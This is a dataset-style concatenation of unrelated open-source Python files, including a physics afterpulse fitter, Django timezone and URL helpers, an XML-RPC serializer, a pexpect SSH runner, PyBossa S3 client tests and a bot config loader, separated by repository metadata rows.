if self.timestamp != other.timestamp:
return False
if self.asset != other.asset:
return False
return True
def __hash__(self):
return hash(repr(self))
def __repr__(self):
return "%s: %s %s @ %s" % (
utils.timestamp_to_date(self.timestamp, '%Y %m %d'),
self.quantity,
self.asset,
self.price)
def invert_quantity(self):
self.quantity = self.quantity * -1
@property
def size(self):
return abs(self.quantity)
@property
def buy(self):
return self.quantity > 0
@property
def sell(self):
return self.quantity < 0
@property
def zero(self):
return self.quantity == 0
def copy(self, quantity=None):
return Transaction(
self.timestamp,
quantity or self.quantity,
self.asset,
**self.data)
| agpl-3.0 | 6,468,546,355,782,887,000 | 32.326733 | 77 | 0.645276 | false |
ntim/g4sipm | sample/run/luigi/contrib/afterpulse.py | 1 | 3367 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from ROOT import TH1, Double, ROOT, TF1
def prob_dist_1comp(x, par):
dt = x[0]
amp = par[0]
pL = par[1]
tauL = par[2]
tauTh = par[3]
T = np.exp(-dt / tauTh)
L = np.exp(-dt / tauL)
pTot = 0
pTot += T * (1. - pL) / tauTh
pTot += T * L * pL * (1. / tauL + 1. / tauTh)
return amp * pTot
def prob_dist(x, par):
dt = x[0]
amp = par[0]
pS = par[1]
pL = par[2]
tauS = par[3]
tauL = par[4]
tauTh = par[5]
T = np.exp(-dt / tauTh)
S = np.exp(-dt / tauS)
L = np.exp(-dt / tauL)
pTot = 0
pTot += T * (1. - pS) * (1. - pL) / tauTh
pTot += T * S * pS * (1. - pL) * (1. / tauS + 1. / tauTh)
pTot += T * L * pL * (1. - pS) * (1. / tauL + 1. / tauTh)
pTot += T * S * L * pS * pL * (1. / tauS + 1. / tauL + 1. / tauTh)
return amp * pTot
def fit(h, xlow=50):
# Set default fitter.
ROOT.Math.MinimizerOptions.SetDefaultTolerance(1e-3)
ROOT.Math.MinimizerOptions.SetDefaultMinimizer("Minuit2")
ROOT.Math.MinimizerOptions.SetDefaultMaxIterations(1000)
ROOT.Math.MinimizerOptions.SetDefaultMaxFunctionCalls(1000)
ROOT.Math.MinimizerOptions.SetDefaultPrecision(1e-9)
# Fit thermal noise component.
preFit = TF1("preFit", "[0]*exp(-x/[1])", 600, h.GetBinLowEdge(h.GetNbinsX()))
preFit.SetParameter(1, 1000)
preFit.SetParLimits(1, 10, 10000) # 100kHz to 10MHz
h.Fit(preFit, "RN")
# Fit long component.
preFit2 = TF1("fitDeltaTOneComp", prob_dist_1comp, 400, h.GetBinLowEdge(h.GetNbinsX()), 4)
preFit2.SetParNames("A", "P_{l}", "#tau_{l}", "#tau_{th}")
preFit2.SetParameters(1., 0.2, 150, preFit.GetParameter(1))
preFit2.SetParLimits(1, 0.01, 1.)
preFit2.SetParLimits(2, 80., 240.)
preFit2.SetParLimits(3, preFit.GetParameter(1) - 3. * preFit.GetParError(1), preFit.GetParameter(1) + 3. * preFit.GetParError(1))
h.Fit(preFit2, "RNM")
# Fit complete distribution.
fit = TF1("fitDeltaT", prob_dist, xlow, h.GetBinLowEdge(h.GetNbinsX()), 6)
fit.SetParNames("A", "P_{s}", "P_{l}", "#tau_{s}", "#tau_{l}", "#tau_{th}")
fit.SetParameters(1., 0.2, preFit2.GetParameter(1), 50, preFit2.GetParameter(2), preFit.GetParameter(1))
fit.SetParLimits(1, 0.01, 1.)
fit.SetParLimits(2, preFit2.GetParameter(1) - 10. * preFit2.GetParError(1), preFit2.GetParameter(1) + 10. * preFit2.GetParError(1))
fit.SetParLimits(3, 10., 80.)
fit.SetParLimits(4, preFit2.GetParameter(2) - 10. * preFit2.GetParError(2), preFit2.GetParameter(2) + 10. * preFit2.GetParError(2))
fit.SetParLimits(5, preFit.GetParameter(1) - 3. * preFit.GetParError(1), preFit.GetParameter(1) + 3. * preFit.GetParError(1))
h.Fit(fit, "RNM")
h.GetListOfFunctions().Add(fit)
# Return results
amp = fit.GetParameter(0)
amp_err = fit.GetParError(0)
p_ap_s = fit.GetParameter(1)
p_ap_s_err = fit.GetParError(1)
p_ap_l = fit.GetParameter(2)
p_ap_l_err = fit.GetParError(2)
tau_s = fit.GetParameter(3)
tau_s_err = fit.GetParError(3)
tau_l = fit.GetParameter(4)
tau_l_err = fit.GetParError(4)
tau_th = fit.GetParameter(5)
tau_th_err = fit.GetParError(5)
return amp, amp_err, p_ap_s, p_ap_s_err, p_ap_l, p_ap_l_err, tau_s, tau_s_err, tau_l, tau_l_err, tau_th, tau_th_err, fit.GetChisquare(), fit.GetNDF()
| gpl-3.0 | -5,261,657,332,472,781,000 | 40.567901 | 153 | 0.610039 | false |
cedadev/cloudhands-burst | cloudhands/burst/agent.py | 1 | 2328 | #!/usr/bin/env python
# encoding: UTF-8
import asyncio
from collections import namedtuple
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
import logging
import sqlite3
import warnings
from cloudhands.common.connectors import initialise
from cloudhands.common.connectors import Registry
Job = namedtuple("Job", ["uuid", "token", "artifact"])
class Agent:
def __init__(self, workQ, args, config):
self.work = workQ
self.args = args
self.config = config
@staticmethod
def queue(args, config, loop=None):
return asyncio.Queue(loop=loop)
@property
def callbacks(self):
raise NotImplementedError
def jobs(self, session):
raise NotImplementedError
@asyncio.coroutine
def __call__(self, loop, msgQ):
raise NotImplementedError
@singledispatch
def message_handler(msg, *args, **kwargs):
warnings.warn("No handler for {}".format(type(msg)))
pass
@asyncio.coroutine
def operate(loop, msgQ, workers, args, config):
log = logging.getLogger("cloudhands.burst.operate")
session = Registry().connect(sqlite3, args.db).session
initialise(session)
tasks = [asyncio.Task(w(loop, msgQ, session)) for w in workers]
pending = set()
log.info("Starting task scheduler.")
while any(task for task in tasks if not task.done()):
yield from asyncio.sleep(0)
for worker in workers:
for job in worker.jobs(session):
if job.uuid not in pending:
pending.add(job.uuid)
log.debug("Sending {} to {}.".format(job, worker))
yield from worker.work.put(job)
pause = 0.1 if pending else 1
yield from asyncio.sleep(pause)
try:
while True:
msg = msgQ.get_nowait()
try:
act = session.merge(message_handler(msg, session))
except Exception as e:
session.rollback()
log.error(e)
else:
pending.discard(act.artifact.uuid)
session.close() # Refresh or expire not effective here
log.debug(msg)
except asyncio.QueueEmpty:
continue
| bsd-3-clause | -3,134,247,760,245,154,000 | 27.048193 | 75 | 0.60567 | false |
orlenko/bccf | src/django_cron/timezone.py | 1 | 8256 | """Timezone helper functions.
This module uses pytz when it's available and fallbacks when it isn't.
"""
from datetime import datetime, timedelta, tzinfo
from threading import local
import time as _time
try:
import pytz
except ImportError:
pytz = None
from django.conf import settings
__all__ = [
'utc', 'get_default_timezone', 'get_current_timezone',
'activate', 'deactivate', 'override',
'is_naive', 'is_aware', 'make_aware', 'make_naive',
]
settings.USE_TZ = False
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class LocalTimezone(tzinfo):
"""
Local time implementation taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
"""
def __init__(self):
# This code is moved in __init__ to execute it as late as possible
# See get_default_timezone().
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def __repr__(self):
return "<LocalTimezone>"
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
# In order to avoid accessing the settings at compile time,
# wrap the expression in a function and cache the result.
_localtime = None
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
See also :func:`get_current_timezone`.
"""
global _localtime
if _localtime is None:
if isinstance(settings.TIME_ZONE, basestring) and pytz is not None:
_localtime = pytz.timezone(settings.TIME_ZONE)
else:
_localtime = LocalTimezone()
return _localtime
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
local_now = datetime.now(timezone)
return timezone.tzname(local_now)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, basestring) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(object):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
time zone name, or ``None``. If is it a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
self.old_timezone = getattr(_active, 'value', None)
def __enter__(self):
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is not None:
_active.value = self.old_timezone
else:
del _active.value
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (isinstance(value, datetime)
and (settings.USE_TZ if use_tz is None else use_tz)
and not is_naive(value)
and getattr(value, 'convert_to_local_time', True))
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is not None and value.tzinfo.utcoffset(value) is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is None or value.tzinfo.utcoffset(value) is None
def make_aware(value, timezone):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if hasattr(timezone, 'localize'):
# available for pytz time zones
return timezone.localize(value, is_dst=None)
else:
# may be wrong around DST changes
return value.replace(tzinfo=timezone)
def make_naive(value, timezone):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value.replace(tzinfo=None) | unlicense | 6,542,756,796,065,424,000 | 27.277397 | 81 | 0.645833 | false |
asphalt-framework/asphalt-web | asphalt/web/rpc/xmlrpc/serialization.py | 1 | 4239 | import math
from base64 import b64encode, b64decode
from collections import OrderedDict
from collections.abc import Sequence, Mapping
from datetime import date, datetime
from typing import List, Dict, Any
from xml.sax.saxutils import escape
from asphalt.core.utils import qualified_name
from lxml.etree import Element
__all__ = ('serialize', 'deserialize')
_serializers = OrderedDict()
_deserializers = OrderedDict()
def serialize(obj) -> str:
"""
Serialize the given object into an XML-RPC ``<value>`` element.
:param obj: the object to serialize
:return: an XML fragment
"""
for cls, func in _serializers.items():
if isinstance(obj, cls):
return '<value>%s</value>' % func(obj)
raise TypeError('%s is not serializable' % qualified_name(obj.__class__))
def serializer(cls: type):
def wrapper(func):
_serializers[cls] = func
return func
return wrapper
@serializer(str)
def serialize_str(obj: str) -> str:
return '<string>%s</string>' % escape(obj)
@serializer(bool)
def serialize_bool(obj: bool) -> str:
return '<boolean>%d</boolean>' % obj
@serializer(int)
def serialize_int(obj: int) -> str:
if not -2147483648 <= obj <= 2147483647:
raise ValueError('%d is out of range of XML-RPC (32-bit) integer' % obj)
return '<i4>%d</i4>' % obj
@serializer(float)
def serialize_float(obj: float) -> str:
if math.isnan(obj) or math.isinf(obj):
raise ValueError('XML-RPC does not support serializing infinity or NaN float objects')
return '<double>%s</double>' % str(obj).rstrip('0')
@serializer(bytes)
def serialize_bytes(obj: bytes):
return '<base64>%s</base64>' % b64encode(obj).decode()
@serializer(datetime)
def serialize_datetime(obj: datetime) -> str:
return '<dateTime.iso8601>%s</dateTime.iso8601>' % obj.strftime('%Y%m%dT%H:%M:%S')
@serializer(date)
def serialize_date(obj: date) -> str:
return '<dateTime.iso8601>%s</dateTime.iso8601>' % obj.strftime('%Y%m%dT00:00:00')
@serializer(Sequence)
def serialize_sequence(obj: Sequence) -> str:
payload = [serialize(value) for value in obj]
return '<array><data>%s</data></array>' % ''.join(payload)
@serializer(Mapping)
def serialize_mapping(obj: Mapping) -> str:
payload = '<struct>'
for key, value in obj.items():
serialized_value = serialize(value)
payload += '<member><name>%s</name>%s</member>' % (escape(key), serialized_value)
return payload + '</struct>'
def deserialize(value: Element):
"""
Deserialize an XML-RPC <value> element.
:param value: an XML element with the tag <value>
:return: the deserialized value
"""
child = value[0]
try:
func = _deserializers[child.tag]
except KeyError:
raise LookupError('unknown XML-RPC type: %s' % child.tag) from None
return func(child)
def deserializer(*names: str):
def wrapper(func):
_deserializers.update({key: func for key in names})
return func
return wrapper
@deserializer('string')
def deserialize_str(element: Element) -> str:
return element.text
@deserializer('boolean')
def deserialize_bool(element: Element) -> float:
if element.text == '1':
return True
elif element.text == '0':
return False
else:
raise ValueError('invalid value for boolean: %s' % element.text)
@deserializer('int', 'i4')
def deserialize_int(element: Element) -> int:
return int(element.text)
@deserializer('double', 'float')
def deserialize_float(element: Element) -> float:
return float(element.text)
@deserializer('base64')
def deserialize_base64(element: Element) -> bytes:
return b64decode(element.text)
@deserializer('dateTime.iso8601')
def deserialize_datetime(element: Element) -> datetime:
return datetime.strptime(element.text, '%Y%m%dT%H:%M:%S')
@deserializer('array')
def deserialize_array(element: Element) -> List:
return [deserialize(value) for value in element.findall('data/value')]
@deserializer('struct')
def deserialize_struct(element: Element) -> Dict[str, Any]:
members = element.findall('member')
return {member.find('name').text: deserialize(member.find('value')) for member in members}
| apache-2.0 | 5,541,318,617,819,902,000 | 25.166667 | 94 | 0.671621 | false |
packagecontrol/st_package_reviewer | st_package_reviewer/check/file/check_redundant_files.py | 2 | 1795 | import logging
from . import FileChecker
l = logging.getLogger(__name__)
class CheckPackageMetadata(FileChecker):
def check(self):
if self.sub_path("package-metadata.json").is_file():
self.fail("'package-metadata.json' is supposed to be automatically generated "
"by Package Control during installation")
class CheckPycFiles(FileChecker):
def check(self):
pyc_files = self.glob("**/*.pyc")
if not pyc_files:
return
for path in pyc_files:
if path.with_suffix(".py").is_file():
with self.file_context(path):
self.fail("'.pyc' file is redundant because its corresponding .py file exists")
class CheckCacheFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.cache")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.cache' file is redundant and created by ST automatically")
class CheckSublimePackageFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.sublime-package")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.sublime-package' files have no business being inside a package")
class CheckSublimeWorkspaceFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.sublime-workspace")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.sublime-workspace' files contain session data and should never be "
"submitted to version control")
| mit | 7,026,769,167,104,673,000 | 27.492063 | 99 | 0.597214 | false |
HazyResearch/dd-genomics | archived/v1/code/gene_pheno_pairs.py | 1 | 2378 | import ddext
from ddext import SD
def init():
ddext.input('doc_id', 'text')
ddext.input('sent_id_1', 'int')
ddext.input('mention_id_1', 'text')
ddext.input('wordidxs_1', 'int[]')
ddext.input('words_1', 'text[]')
ddext.input('entity_1', 'text')
ddext.input('type_1', 'text')
ddext.input('correct_1', 'boolean')
ddext.input('sent_id_2', 'int')
ddext.input('mention_id_2', 'text')
ddext.input('wordidxs_2', 'int[]')
ddext.input('words_2', 'text[]')
ddext.input('entity_2', 'text')
ddext.input('type_2', 'text')
ddext.input('correct_2', 'boolean')
ddext.returns('doc_id', 'text')
ddext.returns('sent_id_1', 'int')
ddext.returns('sent_id_2', 'int')
ddext.returns('relation_id', 'text')
ddext.returns('type', 'text')
ddext.returns('mention_id_1', 'text')
ddext.returns('mention_id_2', 'text')
ddext.returns('wordidxs_1', 'int[]')
ddext.returns('wordidxs_2', 'int[]')
ddext.returns('words_1', 'text[]')
ddext.returns('words_2', 'text[]')
ddext.returns('entity_1', 'text')
ddext.returns('entity_2', 'text')
ddext.returns('is_correct', 'boolean')
def run(doc_id, sent_id_1, mention_id_1, wordidxs_1, words_1, entity_1, mtype_1, correct_1, sent_id_2, mention_id_2, wordidxs_2, words_2, entity_2, mtype_2, correct_2):
if 'pos_pairs' in SD:
pos_pairs = SD['pos_pairs']
else:
import os
APP_HOME = os.environ['DD_GENOMICS_HOME']
pos_pairs = set()
gpheno = [x.strip().split('\t') for x in open('%s/onto/data/hpo_phenotype_genes.tsv' % APP_HOME)]
gdisease = [x.strip().split('\t') for x in open('%s/onto/data/hpo_disease_genes.tsv' % APP_HOME)]
for pheno, gene in gpheno + gdisease:
pos_pairs.add((gene, pheno))
SD['pos_pairs'] = pos_pairs
rid = '%s_%s_g%s_p%s' % (doc_id, sent_id_1,
'%d:%d' % (wordidxs_1[0], wordidxs_1[-1]),
'%d:%d' % (wordidxs_2[0], wordidxs_2[-1]),
)
truth = None
if correct_1 and correct_2:
gene = entity_1
for pheno in entity_2.split()[0].split('|'):
if (gene, pheno) in pos_pairs:
truth = True
elif correct_1 is False or correct_2 is False:
truth = False
yield (doc_id,
sent_id_1,
sent_id_2,
rid,
None,
mention_id_1,
mention_id_2,
wordidxs_1,
wordidxs_2,
words_1,
words_2,
entity_1,
entity_2,
truth
)
| apache-2.0 | -2,130,952,374,785,913,000 | 29.101266 | 168 | 0.584945 | false |
dgouldin/djangocon-eu-2015 | djapi/api/url_registry.py | 2 | 2925 | import types
from collections import defaultdict
from functools import wraps
from urlparse import urljoin
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse, NoReverseMatch
LIST_METHODS = ('POST',)
DETAIL_METHODS = ('PUT', 'PATCH', 'DELETE',)
ALL_METHODS = LIST_METHODS + DETAIL_METHODS
model_registry = defaultdict(list)
def register(methods, model):
"""
Decorator for registering lookup functions. Modeled after django.dispatch.receiver.
A lookup_func should return a fully qualified path.
"""
def _decorator(lookup_func):
model_registry[model].append((methods, lookup_func))
return lookup_func
return _decorator
def normalize_channel(path):
"Strip off querystring and trailing slashes"
return path.split('?', 1)[0].rstrip('/')
def find_urls(obj, method):
"Utility to locate URLs that might include details of a given object"
for methods, lookup_func in model_registry[type(obj)]:
if method in methods:
yield lookup_func(obj)
# helpers for generating common URLs
def empty(viewname):
"For URLs that don't require any arguments at all"
url = reverse(viewname)
def _empty(obj):
return url
return _empty
def primary_key(viewname):
"For URLs that accept a primary key as 'pk'"
def _primary_key(obj):
return reverse(viewname, kwargs={'pk': obj.pk})
return _primary_key
def primary_key_filter(viewname):
"For URLs that filter on the primary key field via a query param"
def _primary_key_filter(obj):
pk_field = obj.__class__._meta.pk.name
return "{}?{}={}".format(reverse(viewname), pk_field, obj.pk)
return _primary_key_filter
def foreign_key(viewname, fk_field_name):
"""
For URLs that refer to an instance via a foreign key
Accepts the name of the foreign key
"""
def _foreign_key(obj):
fk_field = obj.__class__._meta.get_field(fk_field_name)
return reverse(viewname, kwargs={'pk': getattr(obj, fk_field.attname)})
return _foreign_key
def generic_foreign_key(viewname, gfk_field_name, model):
"""
For URLs that refer to an instance via a generic foreign key
Accepts the name of the foreign key, and also the model this particular URL
is associated with, since the foreign key can refer to multiple model types
"""
def _generic_foreign_key(obj):
content_type_id = ContentType.objects.get_for_model(model).id
gfk_field = getattr(obj.__class__, gfk_field_name)
ct_field = obj._meta.get_field(gfk_field.ct_field)
if getattr(obj, ct_field.attname) == content_type_id:
return reverse(viewname, kwargs={'pk': getattr(obj, gfk_field.fk_field)})
# this should never happen
raise NoReverseMatch('Unable to resolve generic foreign key for {}'.format(obj))
return _generic_foreign_key
| mit | -4,767,235,335,549,177,000 | 30.451613 | 88 | 0.681709 | false |
jarod-w/ocsetup | ocsetup/sshcmd.py | 1 | 1977 | #!/usr/bin/env python
import pexpect
import sys
import gtk
from ovirtnode.ovirtfunctions import log
class PopupEntry(gtk.Dialog):
def __init__(self, label="", title="", parent=None, flags=0, buttons=None):
super(PopupEntry, self).__init__(title, parent, flags, buttons)
self.hbox = gtk.HBox()
self.label = gtk.Label(label)
self.add_button("OK", gtk.RESPONSE_OK)
self.entry = gtk.Entry()
self.entry.set_visibility(False)
self.hbox.pack_start(self.label)
self.hbox.pack_start(self.entry)
self.vbox.pack_start(self.hbox)
self.set_position(gtk.WIN_POS_CENTER_ALWAYS)
def run_and_close(self):
self.show_all()
resp_id = self.run()
text = self.entry.get_text()
self.destroy()
return text
def runcmd(cmd):
child = pexpect.spawn(cmd, logfile=sys.stdout)
while True:
i = child.expect([
pexpect.TIMEOUT,
'Are you sure you want to continue connecting',
'Enter passphrase for key',
'Permission denied, please try again.',
'password: ',
'Permission denied',
pexpect.EOF])
if i == 0:
# TIMEOUT.
return
elif i == 1:
child.sendline('yes')
elif i == 2:
child.send("\r")
elif i == 3:
# wrong password, but you can still try AGAIN.
password = PopupEntry(
label='Password:',
title="Wrong Password?").run_and_close()
elif i == 4:
password = PopupEntry(label='Password:').run_and_close()
child.sendline(password)
elif i == 5:
# LOGIN FAILED
return
elif i == 6:
# LOGIN SUCCEED.
return child
else:
log(
"run cmd error i = %d\n before:%s\nafter:%s" %
(i, child.before, child.after))
| gpl-2.0 | -8,240,140,385,106,602,000 | 28.954545 | 79 | 0.528073 | false |
PyBossa/pybossa | test/test_s3_client.py | 1 | 5554 | # -*- coding: utf8 -*-
# This file is part of PYBOSSA.
#
# Copyright (C) 2015 Scifabric LTD.
#
# PYBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PYBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PYBOSSA. If not, see <http://www.gnu.org/licenses/>.
from mock import patch, MagicMock
from nose.tools import assert_raises
import json
from pybossa.s3_client import S3Client, NoSuchBucket, PrivateBucket
class TestS3Client(object):
def make_response(self, text, status_code=200):
fake_response = MagicMock()
fake_response.text = text
fake_response.status_code = status_code
return fake_response
bucket_with_content = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>16535035993_1080p.mp4</Key>
<LastModified>2016-01-29T08:55:41.000Z</LastModified>
<ETag>"10055dfebe62cf30e34d87fd27b28efc"</ETag>
<Size>11801468</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>BFI-demo.mp4</Key>
<LastModified>2016-01-29T08:55:38.000Z</LastModified>
<ETag>"b24442a1484b6b8f2b4e08c43e0abd3f"</ETag>
<Size>27063915</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
""")
empty_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
</ListBucketResult>
""")
no_such_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist</Message>
<BucketName>test-pybosa</BucketName>
<RequestId>5DB95818E2273F2A</RequestId>
<HostId>2xqg6pMK20zocCIN0DpqzDVEmbNkqKdTrp0BT/K2EUBbSIek5+7333DjDVuvpN0fFR/Pp/+IkM8=</HostId>
</Error>
""")
bucket_with_folder = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>myfolder/</Key>
<LastModified>2016-01-29T08:56:15.000Z</LastModified>
<ETag>"d41d8cd98f00b204e9800998ecf8427e"</ETag>
<Size>0</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
""")
private_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>0C189C667703869B</RequestId>
<HostId>e6HNleTSx+vQHCXsjphJNLumbwd2YfYfZMrEBEkGOF/0jCMDZf6RIrgUAooa+HT86f0Azr27/h4=</HostId>
</Error>
""")
@patch('pybossa.s3_client.requests')
def test_objects_return_empty_list_for_an_empty_bucket(self, requests):
resp = self.make_response(self.empty_bucket, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [], objects
@patch('pybossa.s3_client.requests')
def test_objects_return_list_of_object_names_in_a_bucket(self, requests):
resp = self.make_response(self.bucket_with_content, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [u'16535035993_1080p.mp4', u'BFI-demo.mp4'], objects
@patch('pybossa.s3_client.requests')
def test_objects_not_returns_folders_inside_bucket(self, requests):
resp = self.make_response(self.bucket_with_folder, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [], objects
@patch('pybossa.s3_client.requests')
def test_objects_raises_NoSuchBucket_if_bucket_does_not_exist(self, requests):
resp = self.make_response(self.no_such_bucket, 404)
requests.get.return_value = resp
assert_raises(NoSuchBucket, S3Client().objects, 'test-pybossa')
@patch('pybossa.s3_client.requests')
def test_objects_raises_PrivateBucket_if_bucket_is_private(self, requests):
resp = self.make_response(self.no_such_bucket, 403)
requests.get.return_value = resp
assert_raises(PrivateBucket, S3Client().objects, 'test-pybossa')
| agpl-3.0 | -8,953,775,506,088,436,000 | 37.041096 | 105 | 0.620274 | false |
LastAvenger/labots | labots/config/config.py | 1 | 3322 | import logging
import yaml
from typing import Dict
from labots.config import checker
from labots.common import meta
# Initialize logging
logger = logging.getLogger(__name__)
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class Config(AttrDict):
pass
def load_config(raw: str) -> Config:
""" Load config from a yaml format string. """
d = yaml.load(raw)
try:
checker.check(d, [
checker.Item(key = ['log', 'level'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = 'info'),
checker.Item(key = ['log', 'output'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = 'stderr'),
checker.Item(key = ['log', 'color'],
checkers = [checker.is_bool],
default = True),
checker.Item(key = ['irc', 'host'],
checkers = [checker.is_str, checker.is_not_empty_str],
required = True),
checker.Item(key = ['irc', 'port'],
checkers = [checker.is_int, checker.is_port],
default = 6667,
required = True),
checker.Item(key = ['irc', 'tls'],
checkers = [checker.is_bool],
default = False),
checker.Item(key = ['irc', 'tls_verify'],
checkers = [checker.is_bool],
default = True),
checker.Item(key = ['irc', 'server_password'],
checkers = [checker.is_str],
default = None),
checker.Item(key = ['irc', 'nickname'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.name),
checker.Item(key = ['irc', 'username'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.name),
checker.Item(key = ['irc', 'realname'],
checkers = [checker.is_str, checker.is_not_empty_str],
default = meta.url),
checker.Item(key = ['irc', 'user_password'],
checkers = [checker.is_str],
default = None),
checker.Item(key = ['manager', 'bots'],
checkers = [checker.is_str],
required = True),
checker.Item(key = ['manager', 'config'],
checkers = [checker.is_str]),
checker.Item(key = ['server', 'listen'],
checkers = [checker.is_str],
default = meta.default_listen),
checker.Item(key = ['storage', 'db'],
checkers = [checker.is_str],
default = './storage.db'),
